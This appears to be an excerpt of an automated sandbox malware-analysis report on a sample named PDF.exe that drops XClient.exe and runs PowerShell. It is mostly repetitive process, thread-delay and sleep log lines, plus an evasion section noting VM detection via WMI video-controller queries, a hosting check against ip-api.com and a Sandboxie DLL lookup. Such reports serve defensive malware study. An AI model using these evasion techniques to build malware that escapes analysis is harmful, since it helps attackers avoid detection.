                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Check if machine is in data center or colocation facility
                                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                                    Source: PDF.exe, 00000000.00000002.2898462305.00000000028D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                                    Source: PDF.exe, XClient.exe.0.drBinary or memory string: SBIEDLL.DLLINFO
                                    Source: C:\Users\user\Desktop\PDF.exeMemory allocated: D90000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeMemory allocated: 1A8D0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeMemory allocated: 2BD0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeMemory allocated: 1ADE0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeMemory allocated: FF0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeMemory allocated: 1A9F0000 memory reserve | memory write watch
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 599891Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 599766Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 599641Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 599532Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 599407Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 599282Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 599172Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 599063Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598938Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598813Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598688Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598563Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598438Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598328Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598219Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598109Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 598000Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 597891Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 597782Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 597657Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 597547Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 597438Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 597313Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 597188Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 597063Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 596938Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 596828Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 596719Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 596594Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 596485Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 596360Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 596235Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 596110Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 595985Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 595860Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 595735Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 595610Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 595485Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 595360Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 595235Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 595110Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 594985Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 594860Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeThread delayed: delay time: 594735Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\Desktop\PDF.exeWindow / User API: threadDelayed 7890Jump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exeWindow / User API: threadDelayed 1931Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5494Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4354Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6764Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2896Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6970Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2613Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7405
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2152
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -599891s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -599766s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -599641s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -599532s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -599407s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -599282s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -599172s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -599063s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -598938s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -598813s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -598688s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -598563s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -598438s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -598328s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -598219s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -598109s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -598000s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -597891s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -597782s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -597657s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -597547s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -597438s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -597313s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -597188s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -597063s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -596938s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -596828s >= -30000sJump to behavior
                                    Source: C:\Users\user\Desktop\PDF.exe TID: 8024Thread sleep time: -596719s >= -30000sJump to behavior
